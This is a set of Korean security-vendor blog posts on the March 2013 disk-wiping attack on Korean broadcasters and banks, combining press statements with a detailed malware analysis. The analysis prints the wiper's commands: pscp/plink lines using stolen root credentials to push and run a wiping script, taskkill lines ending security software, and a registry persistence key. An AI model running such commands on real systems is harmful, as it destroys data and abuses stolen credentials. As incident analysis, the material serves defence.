최근 특정 방송사 및 일부 언론에서 보도한 ‘3.20 사이버 테러와 관련하여 사실과 다른 부분이 많아 이를 바로잡고자 합니다특히 대중의 이해를 돕기 위해 쉽고 단순화하여 보도하는 과정에서 전문적 내용이 너무 포괄적으로 표현되었습니다이런 이유로 방송/금융 등 6개사에 대한 사이버 테러는 각기 다른 경로로 이루어졌음에도 모두 안랩의 책임인 것으로 보도되어 많은 오해를 낳고 있습니다이에 안랩은 보안 업계 1위 기업으로서 보안에 대한 불필요한 오해를 풀고 보안업계에 대한 정확한 사실을 알릴 필요가 있다고 판단해 아래와 같이 밝힙니다 

‘3.20 사이버 테러에는 안랩의 백신이 이용되지 않았습니다.

보도에는 북한 해커들이 이용한 침투 통로는 백신 프로그램이라거나 북한이 백신 프로그램을 역이용한 것이라고 표현했습니다또한 사이버 테러에서 악성코드를 실어나른 것이 백신 프로그램이라거나 백신 프로그램을 변조 등의 표현도 있습니다.

그러나 이는 안랩에 해당되지 않는 내용입니다.  ‘3.20 사이버 테러를 당한 6개사가 모두 안랩 제품을 사용하는 것은 아니며더구나 백신 프로그램의 변조는 안랩의 경우가 아닙니다. 

안랩의 자산 및 중앙 관리서버(AhnLab Policy Center, APC) 백신이 아닙니다.

‘3.20 사이버 테러에서 이용된 것은 안랩의 백신 프로그램이 아니라 APC 서버입니다또한 APC 서버의 취약점이 이용된 것은 농협의 경우에만 해당됩니다.

APC 서버는 기업 내부망에서 백신 프로그램이나 일반 소프트웨어가 최신 버전으로 유지되는지 중앙에서 관리하는 소프트웨어 제품입니다이는 V3 같은 백신 프로그램이 아니며보안 제품도 아닙니다. 

해당 언론사의 비유를 빌어 이번 해킹 사건 수법을 설명하자면 아래와 같습니다.

어떤 집이 재산을 보호하기 위해 담벼락창문현관 및 방문 등 각 영역 별로 각기 다른 전문 경비업체(보안회사)와 함께 보안 시스템을 구성 및 운영했습니다집 주인은 이러한 보안 수단을 효율적으로 운영하기 위해 노력해야 합니다. (실제로 많은 기업들이 개별 PC 백신을 비롯해네트워크 보안서버 보안 등 모든 분야에 걸친 종합적인 보안 시스템을 구축하기 위해 노력하고 있습니다.)

어느 날집 내부의 재산을 파괴할 목적을 가진 범인이 수개월 전에경비업체를 피해 집안에 몰래 감시 카메라를 설치했습니다(APT 공격으로 기업의 PC를 최초 장악이 수법은 아직 밝혀지지 않았습니다). 강도는 이후 몇 달 간 집 안을 감시하며 집주인의 생활패턴을 모두 파악한 후 집주인처럼 행세하여 재산을 파괴할 수 있는 방법을 찾아 실행했습니다. 경비업체가 아닌 집 주인을 가장해 내부로 침입했고경비업체는 이를 집 주인으로 여긴 것입니다.

여기서 범인은 합동조사단에 따르면 북한 해커이고안랩은 경비업체로 대변되는 보안 솔루션 업체 중 하나입니다또한최초로 언론사 및 금융사 내부 PC를 감염시킨 수법에 대해서는 아직 밝혀지지 않았습니다. 

이전 농협 관련 보도자료에서 안랩의 제한된 책임 부분은 명확히 밝힌 바 있습니다.

안랩은 3 29자체 중간조사결과 보도자료로이번 농협 공격에서 악성코드 침입 이후 단계에서 악용된 자사의 자산 및 중앙 관리서버(APC)의 제품 기능상 이슈를 밝히고 사과했습니다안랩은 자사 백신이 아닌 APC 서버 기능 오류(bug)를 파악한 상황에서 최초 보도자료를 통해 약속한 대로 일부 책임 발표를 검토 중이었습니다또한당시 방송/금융사 6개사 전산장애의 숙주인 것처럼 오인 받았던 농협의 요청도 있어 중간조사결과 보도자료를 배포하게 되었습니다.

안랩은 앞으로도 명확한 인과관계에 의해 책임이 밝혀진다면 이를 피하지 않을 것입니다. 

해외 보안업체에서 밝힌 악성코드는 이번 공격에 사용된 MBR/HDD 파괴 악성코드가 아닙니다

해외 백신제품이 이번 공격에 사용된 ‘Kill MBR(안랩 진단명: Win-Trojan/Agent.24576.JPG)’을 미리 진단하고 있었다는 부분은 사실과 다릅니다해외 보안업체 공식 블로그에도 진단 날짜는 대부분 3 20일 이후로 나와 있습니다(*URL 참고). 해외 보안업체가 지난해 이미 진단했다고 언급한 악성코드는 이번 공격에 사용된 악성코드와 일부 구조가 유사한 변종이지만이번 공격에 사용된MBR을 파괴하는 악성코드는 아닌 것으로 확인됐습니다.

관련 URL

http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~MBRKill-A/detailed-analysis.aspx

http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=2368933 

안랩은 창립 이래 20년 가까이 우리 사회의 안전한 IT 환경을 위해 사명감과 책임감을 갖고 연구개발을 지속해왔습니다또한 고객사의 안전을 최우선으로 노력해 왔으며 책임을 회피한 적이 없습니다이번 ‘3.20 사이버 테러’ 직후 고객정보보호 후속조치를 발표하면서 명확한 조사 결과안랩에 귀책사유가 있다면 피하지 않고 책임을 질 것이라고 밝힌 바 있습니다그러나 책임은 명확하게 입증된 사실을 전제로 한다는 점을 분명히 하고자 합니다 

이번 방송/금융사 6개사 전산장애는 전형적인 APT(Advanced Persistent Threat 지능적 지속 공격방식의 공격입니다. APT 공격은 국가기관의 철저한 감독과 해당 기업의 다층적인 보안 구축에도 불구하고 완벽하게 막아내기엔 부족한 점이 있습니다이런 지능적인 공격을 효과적으로 막고자 보안 업계는 수년 전부터 APT 전용 보안 제품을 개발해왔습니다.  그러나 APT 공격은 기술력만으로 막기 어렵습니다사용자가 관심을 가질 만한 메일이나 메시지웹사이트 등 갖가지 수단(사회공학적 기법)을 이용해 현혹하기 때문입니다따라서 사용자의 보안 의식이 무엇보다 중요합니다.  

안랩은 국내 1위 보안기업으로서 생활 속의 보안지식 공유를 통해 다음 주부터 보안에 대한 이해를 도와 자신과 직장의 정보와 재산을 보호하기 위한 보안지식 공유 캠페인을 전개하고자 합니다.

덧붙여 일부 의원이 라디오 방송에서 언급한 안랩이 완전히 털렸다거나 북한의 용병이라는 언급은 사실이 아님을 말씀드립니다.

감사합니다.

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

- 1차 : 25 APT 트레이스 스캔
- 2차 : 주중 MBR 프로텍터 제공
- 3.20 APT 공격 노출 여부 및 잔여 흔적 추적하는 ‘APT 트레이스 스캔’ 고객사 제공
비상대응체제 유지 및 고객 피해 최소화 노력 지속
 
글로벌 보안 기업 안랩(대표 김홍선, www.ahnlab.com)은 오늘지난 3 20 14시경 발생한 특정 방송사/금융사 대상 APT 공격에 대한 ‘고객정보보호 후속조치’를 발표했다이는 안랩이 공격발생 당일인 3 20 17 49분에 긴급 V3 엔진 업데이트 및 18 40분에 전용백신을 배포한 데 이은 후속조치이다.
 
안랩이 발표한 고객정보보호 후속조치는 △3.20 APT 공격 노출 여부 및 잔여 흔적을 추적하는 ‘APT 트레이스 스캔(APT Trace Scan)’ 제공 △만약에 있을지 모르는 변종에 대비해PC부팅영역인 ‘MBR(마스터부트레코드)’ 보호를 위한 ‘MBR 프로텍터(MBR Protector)’ 제공 등이다.
 
안랩은 우선 25일부터 ‘APT 트레이스 스캔(APT Trace Scan)’을 고객사에 개별적으로 제공했다. APT 트레이스 스캔은 자신의 PC가 이번 ‘3.20 APT 공격’에 노출됐는지 여부와 공격 흔적을 확인하는 프로그램이다이는 안랩 고객사 중장애증상을 겪지 않았거나 공격 당일 엔진 업데이트 및 전용백신을 실행했어도 이번 공격과 관련해 내부 시스템의 안전 상태를 더욱 정확하게 알고 싶어하는 고객과추측성 정보로 불안해 하고 있는 고객을 위한 지원 프로그램이다.
 
이 프로그램은 사용자의 PC를 스캔한 후만약 공격 흔적이 발견되면 팝업창을 통해 PC격리 및 백업 등 초기 조치와 별도의 안내사항을 공지한다고객 문의 접수 후에는 전화 및 방문 지원으로 고객피해를 최소화할 계획이다.
 
안랩은 25일 ‘APT 트레이스 스캔(APT Trace Scan)’을 제공하고이후 주중에 MBR 프로텍터 등을 상황에 맞게 제공해 고객 정보보호를 체계적으로 진행해나갈 계획이다.
 
사고 발생 후 안랩은 보안 전문가들을 중심으로 전사 비상 대응 체제를 급박하게 가동하고 있다다만 지금까지 피해가 일반 사용자들까지 퍼져있지 않은 상황에서 추측성 정보를 자제해 사회불안 야기를 피하고명확한 원인규명 및 피해 최소화 솔루션 개발에 집중하고자 대외발표를 자제해 왔다.
 
안랩의 김홍선 대표는 “명확한 조사결과 안랩에 귀책사유가 있다면 피하지 않고 책임을 질 것이며이번 사태가 해결될 때까지 비상대응체제를 유지하고 고객 피해를 최소화하기 위해 전사적인 노력을 기울일 것이다”라고 밝혔다

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩(대표 김홍선, www.ahnlab.com)25일 악성코드의 추가배포 징후를 포착하여 고객 및 개인 PC 사용자의 주의를 당부했다.

 

이번 악성코드의 추가 배포는 오늘 오전 10 30분부터 시작되었고 기업은 물론이고 개인용 PC(불특정 일반인) 대상으로 유포되었다는 점이 특징이다.

 

안랩은 어제(24) 오전 9시 경 변종을 발견하여 분석한 결과 1차 공격에 사용된 악성코드의 특징인 MBR(Master Boot Record) 파괴기능은 물론 C&C(Command & Control) 서버와 통신하는 백도어 설치기능이 추가되었음을 확인했다고 밝혔다.

 

3 20일 방송사와 금융사의 전산망을 마비시킨 1차 공격은 내부 타이머로 공격시간대를 특정한 반면 이번 공격에서는 C&C(Command & Control) 서버와 교신하여 공격자가 원하는 시간대에 공격을 할 수 있도록 되어있다. 특히 이 악성코드는 기존 백신의 진단/치료를 방해하는 기능이 있다.

 

안랩은 ASD엔진의 DNA기술을 이용하여 해당 악성코드를 이미 2013.03.20.07 엔진(20일 오후 9 38분부터 배포)부터 이미 선제 대응이 가능했다.

 

안랩의 V3에 탑재된 ASD(AhnLab Smart Defense) 엔진에서는 해당 악성코드를 유포 하루 전 인 24일 오전 9시경에 수집하였으며관련 정부기관의 조치로 현재 악성코드 유포 사이트 및 C&C서버는 차단된 상태이다.

 

"오늘 오전 10 30 ~ 오후 1 45분까지는 수백 대 이상의 PC가 감염됐을 것으로 추정한다.” 또한 "현재 C&C서버가 차단되어 실행명령은 내려올 수 없으나 기존과는 다른 다양한 방식으로 변종 배포를 시도하고 있어서 기업뿐 아니라 일반 PC사용자들도 주의해야 한다.



신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하는 사고가 한국에서 발생하였으며, ASEC에서는 악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인하였다.


현재 해당 악성코드는 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있으며, 상세한 디스크 손상 내용은 아래 분석 정보에 기술하였다.


해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트 할 경우 검사 및 치료가 가능하며, 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사 및 치료 할 수 있다.


[UPDATE - 2013/03/25]


현재까지 ASEC에서 분석한 이번 주요 방송사 및 은행 전산망 장애를 유발한 악성코드는 다음 이미지와 같이 A 케이스와 B 케이스로 나누어서 발생하였다.



우선 위 이미지 좌측 편의 A 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


우선 드로퍼인 File A는  %Temp% 폴더에 다음 파일들을 생성하게 된다.


1) File B : MBR 파괴 기능 수행

2) File C : UPX 압축 된 SSL 연결을 위한 PUTTY 툴

3) File D : UPX 압축된 SFTP 연결을 위한 PUTTY 툴

4) File E : UNIX 계열 시스템 DISK를 파괴하는 스크립트


File E 스크립트가 대상으로 하는 시스템은 AIX Unix, HP Unix, Solaris 및 Linux 이다.


AIX, HP, Solaris 3개 시스템에서는 DD 명령어로 디스크를 10MB 및 81MB 크기 만큼 0으로 덮어 쓰기 하며, Linux 시스템에서는 다음의 디렉토리를 삭제한다.


/kernel/ 

/usr/ 

/etc/ 

/home/


File A에 의해 생성된 File B가 실행이 되면, %Temp% 폴더에 ~v3.log 파일이 존재하는지 확인 하게 된다. 만약 해당 파일이 존재 하지 않다면 감염 된 시스템의 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하게 된다.



그리고 File A 외부에서 원격 접속을 시도하기 위해, 다음 경로의 환경 설정 파일인 confCons.xml가 존재하는지 확인 하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Local Settings\Application Data\Felix_Deimel\mRemote\confCons.xml


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Local\Felix_Deimel\mRemote\confCons.xml


만약 confCons.xml가 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출한다.


Username="root"

Protocol="SSH"

Password=

Hostname

Descr

Panel

Port

Password


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\File C -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\File D -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


SSH의 SCP의 PUTTY 버전인 pscp를 이용해서 File E 를 Batch(Disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 로 복사한다. 그리고, PUTTY의 command 버전인 plink 를 이용해 Batch(disable all interactive prompts) 종료 후, root 계정으로 호스트의 /tmp/cups 에 실행권한을 주고, /tmp/cpus 를 실행한다. 


이와 함께 외부에서 원격 접속을 시도하기 위한 다른 방법으로 다음 경로의 환경 설정 파일이 존재하는 확인하게 된다.


- Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )

C:\Documents and settings\Administrator\Application Data\VanDyke\Config\ Sessions\*.ini


- Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )

C:\Users\AppData\Roaming\VanDyke\Config\Sessions\*.ini


만약 환경 설정 파일이 존재 할 경우에는 다음 문자열에 해당하는 내용을 추출하게 된다.


S:"Protocol Name"=SSH

S:"Username"=root

D:"Session Password Saved"=00000001

S:"Hostname"=

S:"Password"=

D:"[SSH2] Port"=


그리고 하나의 스레드를 생성 한 후 앞서 획득한 문자열들을 조합하여 다음의 명령을 실행하게 된다.


%Temp%\conime.exe -batch -P [port] -l root -pw  %Temp%\~pr1.tmp [host]:/tmp/cups

%Temp%\alg.exe -batch -P [port] -l root -pw  [host] "chmod 755 /tmp/cups;/tmp/cups"


MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하는 File B는 아래와 같은 파일 매핑 오브젝트(FileMapping Object)를 이용하여 동기화 한 후 하나의 프로세스 만이 실행되도록 한다.


JO840112-CRAS8468-11150923-PCI8273V



그리고  %SystemDirectory%\TEMP\~v3.log 이름의 파일이 존재하는지 확인 한 후, 만약 존재하지 않는다면 MBR(Master Boot Recoard) 및 하드 디스크를 파괴하는 기능을 수행하게 된다.


이와 함께 Taskkill 명령을 WinExeC API로 호출 하여 국내 보안 소프트웨어 프로세스를 종료 하게 된다.


Taskkill /F /IM pasvc.exe

Taskkill /F /IM clisvc.exe


File B는 감염 된 시스템의 윈도우(Windows) 버전에 따라 서로 다른 하드 디스크 파괴 스레드(Thread) 를 생성하게 된다.


1) Major Version 5인 경우 ( Windows XP, Windows 2003 Server 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 논리 드라이브를 "PRINCPES" 문자열로 덮어 쓰기


B:\부터 Z:\ 까지 모든 논리 드라이브 중에서 드라이브 타입(Drive Type)이 DRIVE_REMOVABLE이나 DRIVE_FIXED인 드라이브의 데이터를 "PRINCIPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 덮어 쓰게 되는 데이터는 약 5.3MB 간격으로 100KB 씩 덮어 쓰게 된다.


2) Major Version 6인 경우 ( Windows 7, Windows VISTA 등 )


* 물리 디스크의 MBR과 VBR 등을 "PRINCPES" 문자열로 덮어 쓰기


최대 10개 까지 물리 디스크( \\PHYSICALDRIVE0 ~ \\PHYSICALDRIVE9 )를 열어 각 물리 디스크의 MBR과 VBR을 "PRINCPES"이라는 문자열로 반복하여 덮어 쓰게 된다. 확장 파티션을 사용하고 있는 시스템의 경우에는 확장 파티션의 각 파티션의 VBR까지 파괴의 대상이 된다.


* 모든 논리 드라이브의 데이터를 "PRINCPES" 문자열로 덮어 쓴 후 삭제


모든 논리 드라이브의 데이터를 "PRINCPES" 문자열을 반복하여 덮어 씀으로써 원본 파일 내용을 제거 한 뒤, 모든 파일을 DeleteFile API로 삭제하고 모든 디렉토리를 RemoveDirectoryA API로 삭제 한다. 그리고 D:\부터 차례대로 드라이브의 파일 시스템을 제거 한 뒤, 마지막으로 C:\에서 제거한다. 그러나, C:\의 %SystemDirectory%, %ProgramData%, %ProgramFiles% 세 경로의 파일은 제거 하지 않는다.





논리 드라이브 파괴를 시작하고 나서 5분 뒤 "Shutdown -r -t 0 "라는 커맨드 라인(Command Line)을 WinExec로 실행 하여 시스템을 재부팅 시키나, 하드 디스크가 파괴 중일 경우에는 시스템은 재부팅 되지 않는다.



추가적으로 확인된 최초 이미지 우측 편의 B 케이스에 사용되었던 파일들에 대한 세부 분석 내용은 다음과 같다.


드로퍼(Dropper) 역할을 수행하는 File K가 실행이 되면 아래와 같이 국내 보안 소프트웨어의 프로세스들을 강제 종료하게 된다.


taskkill /F /IM vrfwsvc.exe

taskkill /F /IM vrptsvc.exe

taskkill /F /IM vrscan.exe

taskkill /F /IM hpcsvc.exe

taskkill /F /IM hsvcmod.exe

taskkill /F /IM vrfwsock.exe

taskkill /F /IM vrmonnt.exe

taskkill /F /IM vrrepair.exe

taskkill /F /IM vrmonsvc.exe


그리고 국내 보안 소프트웨어 관련 다음 파일들을 삭제를 시도하게 되며, 삭제된 파일들과 동일한 경로에 File FFile L을 생성하게 된다.

VrDown.exe 
VrPatch.exe
ptUpdate.exe
update.zip
vms1014.zip

생성된 File L은 디스크 파괴 기능을 수행하는 File F를 다운로드 하기 위한 환경 설정 파일이며, File F는 앞서 언급한 A 케이스의 File B와 동일한 기능을 수행하게 된다. 그러나, 아래와 같은 세가지 다른 차이점을 가지고 있다.


1) File F는 File B가 갖고 있는 ~V3.log 파일의 존재 여부를 통해 하드 디스크 파괴 여부를 결정하는 기능이 포함되어 있지 않다.


2) File B는 "PRINCPES" 문자열을 이용하여 덮어쓰기를 수행하게 되나, File F는 "HASTATI" 문자열을 이용하여 덮어쓰기를 수행하게 된다.


3) File B는 실행 즉시 특정 문자열을 이용해 덮어 쓰기를 수행하게 되는 반면에, File F는 2013년 03월 20일 14시 이후에 특정 문자열을 이용해 덮어 쓰기를 수행하게 된다.


[UPDATE - 2013/03/22]


ASEC에서는 이번 전산망 장애를 유발한 악성코드에 대한 새로운 변형과 함께 함께 앞서 언급한 두가지 감염 케이스들과 다른 형태를 추가적으로 발견하였다.


먼저 추가적으로 발견한 디스크 손상을 유발하는 악성코드 File G는 기존에 발견된 File BFile F 들과 기능상으로는 동일하지만 디스크 손상을 유발하기 위해 덮었는 문자열이 "PR!NCPES"으로만 변경되었다.



그리고 추가적으로 발견된 감염 케이스에 사용된 악성코드는 아래 이미지와 동일한 전체적인 구조를 가지고 동작하게 된다.



최초 File H는 File I와 File J 두 개의 파일을 윈도우 시스템 폴더(C:\Widnwos\system32)에 생성하고 File I 를 실행 시킨다. 실행된 File I는 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe 프로세스에 인젝션 하게 된다. 


인젝션이 성공적으로 이루어지게 될 경우 인젝션된 File J 힙(Heap)을 할당 받은 후 인코딩(Encoding) 되어 있는 자신의 코드를 디코딩(Decoding) 하여 힙을 생성하여 스레드(Thread로) 구동 한다. 이 때 구동되는 스레드가 디스크를 앞서 언급한 File G와 동일한 "PR!NCPES" 문자열로 디스크를 덮어쓰게 된다.


우선 File H는 생성한 File I를 시스템이 재부팅 할 때마다 자동 실행하기 위해서 윈도우 레지스트리(Registry)에 다음의 키에 값을 추가하게 된다.


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Shell = explorer.exe, File I


그리고 생성한 윈도우 시스템 폴더에 생성한 File I와 File J의 시간 정보를 Kernel32.dll이 가지고 있는 시간 정보와 동일 하게 성정한다.


File H악성코드가 구동 될 수 있는 환경을 마련 한 뒤에 CMD.exe를 이용하여 ShellExecuteA 함수를 호출하여 자신을 삭제하게 된다.


그리고 생성된 File I는 SeDebugPrivilege 권한을 이용하여 같이 생성된 File J를 정상 시스템 프로세스인 Lsass.exe에 인젝션을 시도 하게 된다.


인젝션은 우선 정상 시스템인 Lsass.exe 프로세스를 찾은 후 File J의 파일명을 문자열로 메모리 할 당 이후, 해당 문자열을 인자로 하여 LoadLibraryW 함수를 시작 주소로 하여 CreateRemoteThread를 호출하는 기법을 이용하였다.


File J 인젝션에 성공하게 되면 XOR 0x55로 인코딩되어 있는 디스크 손상을 위한 코드를 디코딩 한 후에 할당 받은 메모리에 쓰게 된다.


그리고 GetLocalTime 함수를 이용하여 감염된 시스템의 현재 시간을 구한 후 3월 20일 15시가 되기 전까지 대기하게 된다.


이 후 3월 20일 15시 1분이 되면 디코딩 된 디스크 손상을 위해 Thread로 동작하며 전체적인 기능은 앞서 언급한 File G와 동일하나 아래 두 가지만 다르다.


1) 동기화에 사용되는 파일맴핑 오브젝트(FileMapping Object)를 GOLD0112-CRAS8468-PAGE0923-PCI8273W 사용


2) File G는 디스크 손상을 중단하는 파일명이 "~v3.log" 이었으나, File J은 "kb01.tmp"를 사용


현재까지 이번 전산망 장애 관련 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


Win-Trojan/Agent.24576.JPF (2013.03.20.06)

Win-Trojan/Agent.24576.JPG (2013.03.20.07)

Trojan/Win32.XwDoor (2013.03.20.07)

Dropper/Eraser.427520 (2013.03.20.07)

SH/Eraer (2013.03.20.07)

Dropper/Hijacker.153088 (2013.03.21.01)

Win-Trojan/Loader.49152 (2013.03.21.01)

Win-Trojan/Injector.46080.AX (2013.03.21.01)

Trojan/Win32.HDC (AhnLab, 2013.03.21.01) 


현재 ASEC에서는 추가적인 정보들을 지속적으로 수집중이며, 관련된 악성코드들의 상세한 분석 정보를 작성 중에 있다. 


분석정보가 작성되는데로 해당 정보는 수시로 업데이트 될 예정이다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

안녕하세요. 안랩 ASEC(시큐리티대응센터) 입니.


3월 20일 14시경 주요 방송사 및 은행 전산망 장애가 발생하였습니다. 


악성코드 감염 후 디스크 손상으로 부팅 불가로 인해 장애가 발생한 것으로 확인되었고, 해당 악성코드는 아래와 같이 운영체제에 따라 디스크를 손상시키는 기능이 포함되어 있습니다.

- Windows XP, Windows 2003 Server
물리 디스크의 MBR과 VBR 등을 쓰레기 데이터 채움
논리 드라이브 파괴 

- Windows VISTA, Windows 7
물리 디스크 파괴
모든 논리 드라이브의 파일 내용을 삭제

해당 악성코드는 V3 엔진(엔진버전:  2013.03.20.06 이상)으로 업데이트하시면 검사/치료가 가능합니다.

또한 3월 20일 오후 6시경부터 제공 중인 전용백신으로도 검사/치료할 수 있습니다.

전용백신 다운로드 받기 

만약 전용백신으로 진단되는 악성코드가 있다면 이미 디스크가 손상되어 부팅이 안될 수 있으니 중요 데이터는 우선 백업을 받으시기를 권해드립니다.

안랩은 ASEC(시큐리티대응센터)과 CERT(컴퓨터침해사고대응센터)를 비롯해 전사 비상 대응 체제를 가동 중입니다. 


추가 정보가 확인되는 대로 안내해 드리겠습니다.


신고
Creative Commons License
Creative Commons License
Posted by DH, L@@